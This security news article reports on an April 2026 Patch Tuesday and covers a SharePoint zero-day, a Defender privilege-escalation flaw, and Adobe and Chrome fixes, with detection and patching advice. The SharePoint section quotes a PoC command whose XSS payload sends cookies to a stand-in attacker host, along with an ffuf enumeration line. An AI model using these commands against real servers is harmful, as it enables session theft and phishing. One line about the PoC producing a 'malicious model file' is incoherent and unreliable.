Microsoft's April 2026 Patch Tuesday closes 167 CVEs, making it one of the largest single-month releases the company has ever shipped. The roll-up includes an actively exploited SharePoint Server zero-day (CVE-2026-32201), a publicly disclosed Windows Defender privilege-escalation flaw nicknamed "BlueHammer" (CVE-2026-33825), and a record-setting batch of nearly 60 browser-related fixes. Coming alongside an out-of-band Adobe Reader RCE patch (CVE-2026-34621) and Google's fourth Chrome zero-day of the year (CVE-2026-5281), this cycle leaves little room for delay.

A record-breaking release

This month's update spans 167 vulnerabilities across Windows and related Microsoft software — one of the heaviest Patch Tuesday loads on record. Several of the fixes are time-sensitive: one SharePoint flaw is already under attack, a Windows Defender bug had working exploit code circulating before a patch existed, and Microsoft Edge inherited a large set of Chromium fixes that pushed the browser-vulnerability count to new highs. Combined with emergency releases from Adobe and Google, security teams have a crowded triage list this week.

CVE-2026-32201: SharePoint spoofing zero-day under active attack

The most pressing item is CVE-2026-32201, a zero-day in Microsoft SharePoint Server that attackers are already exploiting. According to the NVD entry and the CVE.org record, the root cause is improper input validation in Microsoft Office SharePoint that lets an unauthorized attacker carry out spoofing over a network.

Because the flaw requires no authentication, an attacker can present falsified content or interface elements inside an environment users already trust. Mike Walters, president and co-founder of Action1, summarized the downstream risk:

"This CVE can enable phishing attacks, unauthorized data manipulation, or social engineering campaigns that lead to further compromise. The presence of active exploitation significantly increases organizational risk."

Organizations that rely on SharePoint for internal collaboration, document workflows, or partner portals should put this patch at the top of the list. Spoofed notifications and documents make the bug a convenient stepping stone toward credential theft, business email compromise, and supply-chain attacks.

Affected versions

A public proof-of-concept on GitHub lists the impacted builds and the CVSS vector:

  • Affected: SharePoint Server 2016 Enterprise, SharePoint Server 2019, and SharePoint Subscription Edition prior to 16.0.19725.20210
  • Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
  • Impact: viewing or modifying sensitive data via spoofed notifications and documents

Proof of concept

The PoC abuses a crafted POST request that bypasses input validation through a sender_override parameter, and lets the operator customize the spoofed sender, recipient, subject, and message — the message field can carry an XSS payload for cookie theft. Running it produces a malicious model file:


python3 exploit.py https://sharepoint.target.com \
  --recipient victim@target.com \
  --sender "admin@target.com" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

A successful run reports a 200 status and a hint to verify the spoofed content on the target:


[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.

The PoC author also notes that layout endpoints can be enumerated with a fuzzer before targeting the notification path:


ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt

A typical attack chain is: spoof a trusted notification → embed a phishing link → drive the victim toward an authentication bypass, with the injected JavaScript in --message exfiltrating cookies along the way.

CVE-2026-33825: "BlueHammer" Windows Defender privilege escalation

Microsoft also fixed CVE-2026-33825, a privilege-escalation vulnerability in Windows Defender that was publicly nicknamed "BlueHammer." Unlike the SharePoint zero-day, this one went public after the researcher who found it became frustrated with Microsoft's response timeline and dropped working exploit code before a fix shipped.

Will Dormann, senior principal vulnerability analyst at Tharros, confirmed that the public BlueHammer exploit no longer works once this month's patches are applied. Still, the gap between disclosure and patch left a real window of exposure. A privilege-escalation bug in a core security component is especially dangerous: an attacker with an initial foothold can use it to reach SYSTEM and take full control of the host.

  • CVE-2026-33825 affects Windows Defender across multiple Windows versions
  • Working exploit code was public before today's patch
  • Patching immediately removes the known public exploit vector

CVE-2026-34621: Adobe Reader emergency RCE patch

On April 11 — ahead of the regular Patch Tuesday — Adobe shipped an out-of-band update for Adobe Reader to address CVE-2026-34621, a critical remote code execution flaw. Emergency releases like this are uncommon and signal real urgency.

Satnam Narang, senior staff research engineer at Tenable, said evidence points to active exploitation dating back to at least November 2025, meaning attackers may have quietly used the bug for roughly five months before a patch existed. If you haven't deployed the emergency Reader update, treat it as overdue.

CVE-2026-5281: Chrome's fourth zero-day of 2026

Google patched a high-severity zero-day in Chrome earlier this month — the browser's fourth zero-day of 2026 — tracked as CVE-2026-5281. It was part of a Chrome update that fixed 21 security issues in total.

A practical reminder for users and admins: leaving a browser open does not mean you're running the patched build. Chrome only applies updates after a full close and relaunch, so habitually long-lived sessions with dozens of open tabs can leave users on a vulnerable version without realizing it.

  • Chrome CVE-2026-5281 is rated high severity
  • The fix only takes effect after a complete browser restart
  • It is Chrome's fourth zero-day patched in 2026

Nearly 60 browser flaws — and the AI question

One of the most notable figures this month is the inclusion of nearly 60 browser-related vulnerabilities. Adam Barnett, lead software engineer at Rapid7, observed that this is a record for that category, driven largely by Microsoft Edge's Chromium foundation and Microsoft's republishing of a broad set of upstream Chromium fixes.

The timing prompted speculation about whether Project Glasswing — a heavily promoted Anthropic capability said to be good at finding software bugs — is contributing to the spike. Barnett cautioned against drawing a direct link, noting that Chromium maintainers credit a wide range of independent researchers for these finds, but he pointed to a larger trend:

"A safe conclusion is that this increase in volume is driven by ever-expanding AI capabilities. We should expect to see further increases in vulnerability reporting volume as the impact of AI models extend further, both in terms of capability and availability."

Regardless of how much AI tooling contributed this month, the direction is clear: vulnerability discovery is speeding up, and patch-management programs need to scale with it.

Detection and mitigation

For the actively exploited SharePoint zero-day, the PoC author highlights several defensive checks:

  • Server-side logs: review SharePoint ULS logs and IIS logs for anomalous requests, particularly unexpected POST traffic to layout endpoints such as /_layouts/15/notify.aspx.
  • Success indicators to hunt for: 200 OK responses paired with "sent" or "success" strings in the response body.
  • Content monitoring: watch email and documents for forged-sender notifications, and test for unauthorized data modification.
  • Patch: upgrade SharePoint Server 2016 Enterprise, 2019, and Subscription Edition to 16.0.19725.20210 or later.

For the rest of the cycle, a reasonable triage order is:

  • Immediate (24–48 hours): CVE-2026-32201 (SharePoint zero-day, actively exploited) and CVE-2026-34621 (Adobe Reader RCE, likely exploited since November 2025).
  • High priority (within a week): CVE-2026-33825 (BlueHammer / Windows Defender privilege escalation, public exploit available) and CVE-2026-5281 (Chrome zero-day — confirm the browser has been fully restarted).
  • Standard cycle: the remaining 163-plus Microsoft CVEs, prioritized by CVSS and asset exposure within your environment.

Bottom line

April 2026's Patch Tuesday is not one to postpone. Between an actively exploited SharePoint zero-day, a publicly disclosed Windows Defender escalation bug, and critical out-of-band fixes from Adobe and Google, the exposure left by unpatched systems is significant. Start emergency patching for the actively exploited and publicly disclosed issues now, then accelerate your standard deployment for the rest. The SANS Internet Storm Center's April 2026 Patch Tuesday roundup offers a per-CVE breakdown for teams that want to dig deeper.